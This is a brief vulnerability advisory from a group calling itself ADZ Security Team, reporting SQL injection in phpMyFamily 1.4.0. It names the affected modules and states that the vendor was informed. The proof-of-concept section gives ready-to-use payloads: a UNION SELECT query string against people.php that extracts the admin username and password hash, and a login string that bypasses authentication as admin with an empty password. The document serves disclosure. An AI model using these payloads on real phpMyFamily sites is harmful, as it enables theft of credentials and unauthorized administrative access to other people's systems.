ADZ Security Team =================== Info Program: phpMyFamily Version: 1.4.0 Modules: people.php, track.php, edit.php, document.php, census.php, passthru.php and other.. Bug type: SQL Injection Vendor site: http://www.phpmyfamily.net/ Vendor Informed: Yes =================== Bug Info Basic SQL-Injection in of this engine Examples/PoC: http://[host]/[path]/people.php?person=00002' %20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH ERE%20admin='Y'%20LIMIT%201,1/* - This selects first admin with login & password hash :) Login as admin without pass: Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes) Password: (empty) =================== Contact ADZ Security Team URL: http://adz.void.ru/ IRC: #adz @ QuakeNet MAIL: kre0n@xxxxxxx, adz.kreon@xxxxxxxxx (for non-russian users)
